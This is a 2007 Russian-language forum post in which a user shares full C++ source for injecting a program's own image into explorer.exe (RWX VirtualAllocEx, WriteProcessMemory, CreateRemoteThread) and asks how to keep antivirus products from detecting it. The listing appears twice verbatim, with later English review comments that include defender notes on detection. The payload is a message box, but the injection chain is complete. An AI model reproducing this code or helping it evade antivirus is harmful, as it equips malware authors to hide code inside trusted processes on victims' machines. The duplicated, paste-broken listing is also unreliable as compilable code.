gold-goblin
25.06.2007, 16:52
Короче, вот код на C++, осуществляющий инжект в explorer.exe. Проблема в том, что на него ругаются антивирусы :mad:. Подскажите решение этой проблемы.
#include < windows.h>
#include < tlhelp32.h>
// Pins the preferred image base of this executable to 0x13140000 at link time.
// NOTE(review): Inject() asks VirtualAllocEx for the same address in the target that this module occupies locally, so the fixed base looks tied to that request - confirm.
#pragma comment(linker,"/BASE:0x13140000")
// Forward declarations for the three helpers defined further down in this listing.
DWORD GetProcessID(char*);
BOOL Inject(HANDLE,DWORD(WINAPI* func)(LPVOID));
DWORD WINAPI func(LPVOID);
// Entry point: looks up "explorer.exe" by name, opens it with PROCESS_ALL_ACCESS and passes the handle to Inject() together with the address of func.
// Returns false (0) when Inject() reports failure and true (1) otherwise.
// NOTE: the space inside "Ge tProcessID" is a paste artifact of the page; the call is to GetProcessID().
// NOTE(review): nothing is validated on the way in - GetProcessID() returns 0 when no process matches, and the OpenProcess result goes straight into Inject() without a NULL check; the handle is never closed.
// Defender's view: a full-access open of explorer.exe by an unrelated user-mode program is a logged and commonly alerted event on its own (e.g. Sysmon Event ID 10, ProcessAccess), before any memory is written.
int WINAPI WinMain(HINSTANCE,HINSTANCE,LPTSTR,int)
{
if(!Inject(OpenProcess(PROCESS_ALL_ACCESS,false,Ge tProcessID("explorer.exe")),&func)) return false;
return true;
}
// Thread routine that Inject() passes to CreateRemoteThread; its LPVOID parameter is unnamed and unused.
// Loads kernel32.dll and user32.dll, busy-waits on the system clock, shows a message box, then returns true (1).
DWORD WINAPI func(LPVOID)
{
// Return values are discarded; the calls only make sure both DLLs are mapped in the process running this thread.
LoadLibrary("kernel32.dll");
LoadLibrary("user32.dll");
SYSTEMTIME SysTime;
GetSystemTime(&SysTime);
// NOTE(review): wSecond is documented as 0..59, so wSecond+30 can be 60..89, and the loop below would then never find a match - confirm.
// Either way this is a spin loop with no Sleep: one core stays busy in the host process until it exits, which is a visible symptom.
WORD time=SysTime.wSecond+30;
while(time!=SysTime.wSecond){GetSystemTime(&SysTime);}
// Demonstration payload: a message box raised by whichever process is running this thread.
MessageBox(0,"Hello from addres area of explorer","title",0);
return true;
}
// Returns the process id of the first entry in a Toolhelp process snapshot
// whose executable name equals lpNameProcess (case-insensitive compare via
// lstrcmpi), or 0 when the snapshot cannot be taken, is empty, or holds no
// match. The match is on the bare image name only, so any process carrying
// that name qualifies; callers have to treat 0 as "not found".
DWORD GetProcessID(char* lpNameProcess)
{
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
        return 0;

    PROCESSENTRY32 entry;
    // The API requires dwSize to be set before the first Process32First call.
    entry.dwSize = sizeof(PROCESSENTRY32);

    DWORD foundPid = 0;
    for (BOOL more = Process32First(hSnapshot, &entry);
         more;
         more = Process32Next(hSnapshot, &entry))
    {
        if (lstrcmpi(lpNameProcess, entry.szExeFile) == 0)
        {
            foundPid = entry.th32ProcessID;
            break;
        }
    }

    // Single exit path: the snapshot handle is released exactly once.
    CloseHandle(hSnapshot);
    return foundPid;
}
// Copies this program's own loaded image into the process behind hProc and starts a thread there at func.
// hProc: handle to the target process, opened by the caller. func: thread start routine, passed to CreateRemoteThread as a local address.
// Returns true once CreateRemoteThread has returned a thread handle, false if the allocation, the write or the thread creation fails.
// Defender's view: allocate executable+writable memory, write into it and start a remote thread in another process is the textbook process-injection chain (MITRE ATT&CK T1055), and that behaviour is what heuristic engines react to.
// Artefacts left in the target: a private PAGE_EXECUTE_READWRITE region holding a PE image with no backing file, and a thread whose start address lies inside it (Sysmon Event ID 8, CreateRemoteThread).
// NOTE: stray spaces and mid-identifier line breaks below (hM odule, MEM_COMMI T, PAGE_EXECUTE_REA / DWRITE, LPVO ID) are paste artifacts of the page, not part of the program.
BOOL Inject(HANDLE hProc,DWORD(WINAPI* func)(LPVOID))
{
DWORD id;
DWORD ByteOfWriten;
// Base address of the running executable itself.
HMODULE hModule = GetModuleHandle(NULL);
// Reads SizeOfImage from the optional header: base + e_lfanew, past the DWORD signature and the IMAGE_FILE_HEADER.
DWORD size=((PIMAGE_OPTIONAL_HEADER)((LPVOID)((BYTE*)(hM odule)+((PIMAGE_DOS_HEADER)(hM
odule))->e_lfanew+sizeof(DWORD)+
sizeof(IMAGE_FILE_HEADER))))->SizeOfImage;
// Requests the region at the same address the module has locally (hModule is passed as the desired address).
// NOTE(review): presumably this is why func's local address can be used as-is for the remote thread - confirm.
char* hNewModule = (char*)VirtualAllocEx(hProc,hModule,size,MEM_COMMI T|MEM_RESERVE,PAGE_EXECUTE_REA
DWRITE);
if(hNewModule==NULL) return false;
// NOTE(review): the BOOL result is ignored and ByteOfWriten has no initial value, so the comparison below relies on the API having stored a count.
WriteProcessMemory(hProc,hNewModule,hModule,size,&ByteOfWriten);
if(ByteOfWriten!=size){return false;}
// The remote base is handed over as the thread parameter; func in this listing does not read it.
HANDLE hThread=CreateRemoteThread(hProc,NULL,0,func,(LPVO ID)hNewModule,0,&id);
// NOTE(review): neither hThread nor the remote allocation is released on any path, so both remain until the processes exit.
if(hThread==0) return false;
return true;
}
#include < windows.h>
#include < tlhelp32.h>
// Pins the preferred image base of this executable to 0x13140000 at link time.
// NOTE(review): Inject() asks VirtualAllocEx for the same address in the target that this module occupies locally, so the fixed base looks tied to that request - confirm.
#pragma comment(linker,"/BASE:0x13140000")
// Forward declarations for the three helpers defined further down in this listing.
DWORD GetProcessID(char*);
BOOL Inject(HANDLE,DWORD(WINAPI* func)(LPVOID));
DWORD WINAPI func(LPVOID);
// Entry point: looks up "explorer.exe" by name, opens it with PROCESS_ALL_ACCESS and passes the handle to Inject() together with the address of func.
// Returns false (0) when Inject() reports failure and true (1) otherwise.
// NOTE: the space inside "Ge tProcessID" is a paste artifact of the page; the call is to GetProcessID().
// NOTE(review): nothing is validated on the way in - GetProcessID() returns 0 when no process matches, and the OpenProcess result goes straight into Inject() without a NULL check; the handle is never closed.
// Defender's view: a full-access open of explorer.exe by an unrelated user-mode program is a logged and commonly alerted event on its own (e.g. Sysmon Event ID 10, ProcessAccess), before any memory is written.
int WINAPI WinMain(HINSTANCE,HINSTANCE,LPTSTR,int)
{
if(!Inject(OpenProcess(PROCESS_ALL_ACCESS,false,Ge tProcessID("explorer.exe")),&func)) return false;
return true;
}
// Thread routine that Inject() passes to CreateRemoteThread; its LPVOID parameter is unnamed and unused.
// Loads kernel32.dll and user32.dll, busy-waits on the system clock, shows a message box, then returns true (1).
DWORD WINAPI func(LPVOID)
{
// Return values are discarded; the calls only make sure both DLLs are mapped in the process running this thread.
LoadLibrary("kernel32.dll");
LoadLibrary("user32.dll");
SYSTEMTIME SysTime;
GetSystemTime(&SysTime);
// NOTE(review): wSecond is documented as 0..59, so wSecond+30 can be 60..89, and the loop below would then never find a match - confirm.
// Either way this is a spin loop with no Sleep: one core stays busy in the host process until it exits, which is a visible symptom.
WORD time=SysTime.wSecond+30;
while(time!=SysTime.wSecond){GetSystemTime(&SysTime);}
// Demonstration payload: a message box raised by whichever process is running this thread.
MessageBox(0,"Hello from addres area of explorer","title",0);
return true;
}
// Returns the process id of the first entry in a Toolhelp process snapshot
// whose executable name equals lpNameProcess (case-insensitive compare via
// lstrcmpi), or 0 when the snapshot cannot be taken, is empty, or holds no
// match. The match is on the bare image name only, so any process carrying
// that name qualifies; callers have to treat 0 as "not found".
DWORD GetProcessID(char* lpNameProcess)
{
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
        return 0;

    PROCESSENTRY32 entry;
    // The API requires dwSize to be set before the first Process32First call.
    entry.dwSize = sizeof(PROCESSENTRY32);

    DWORD foundPid = 0;
    for (BOOL more = Process32First(hSnapshot, &entry);
         more;
         more = Process32Next(hSnapshot, &entry))
    {
        if (lstrcmpi(lpNameProcess, entry.szExeFile) == 0)
        {
            foundPid = entry.th32ProcessID;
            break;
        }
    }

    // Single exit path: the snapshot handle is released exactly once.
    CloseHandle(hSnapshot);
    return foundPid;
}
// Copies this program's own loaded image into the process behind hProc and starts a thread there at func.
// hProc: handle to the target process, opened by the caller. func: thread start routine, passed to CreateRemoteThread as a local address.
// Returns true once CreateRemoteThread has returned a thread handle, false if the allocation, the write or the thread creation fails.
// Defender's view: allocate executable+writable memory, write into it and start a remote thread in another process is the textbook process-injection chain (MITRE ATT&CK T1055), and that behaviour is what heuristic engines react to.
// Artefacts left in the target: a private PAGE_EXECUTE_READWRITE region holding a PE image with no backing file, and a thread whose start address lies inside it (Sysmon Event ID 8, CreateRemoteThread).
// NOTE: stray spaces and mid-identifier line breaks below (hM odule, MEM_COMMI T, PAGE_EXECUTE_REA / DWRITE, LPVO ID) are paste artifacts of the page, not part of the program.
BOOL Inject(HANDLE hProc,DWORD(WINAPI* func)(LPVOID))
{
DWORD id;
DWORD ByteOfWriten;
// Base address of the running executable itself.
HMODULE hModule = GetModuleHandle(NULL);
// Reads SizeOfImage from the optional header: base + e_lfanew, past the DWORD signature and the IMAGE_FILE_HEADER.
DWORD size=((PIMAGE_OPTIONAL_HEADER)((LPVOID)((BYTE*)(hM odule)+((PIMAGE_DOS_HEADER)(hM
odule))->e_lfanew+sizeof(DWORD)+
sizeof(IMAGE_FILE_HEADER))))->SizeOfImage;
// Requests the region at the same address the module has locally (hModule is passed as the desired address).
// NOTE(review): presumably this is why func's local address can be used as-is for the remote thread - confirm.
char* hNewModule = (char*)VirtualAllocEx(hProc,hModule,size,MEM_COMMI T|MEM_RESERVE,PAGE_EXECUTE_REA
DWRITE);
if(hNewModule==NULL) return false;
// NOTE(review): the BOOL result is ignored and ByteOfWriten has no initial value, so the comparison below relies on the API having stored a count.
WriteProcessMemory(hProc,hNewModule,hModule,size,&ByteOfWriten);
if(ByteOfWriten!=size){return false;}
// The remote base is handed over as the thread parameter; func in this listing does not read it.
HANDLE hThread=CreateRemoteThread(hProc,NULL,0,func,(LPVO ID)hNewModule,0,&id);
// NOTE(review): neither hThread nor the remote allocation is released on any path, so both remain until the processes exit.
if(hThread==0) return false;
return true;
}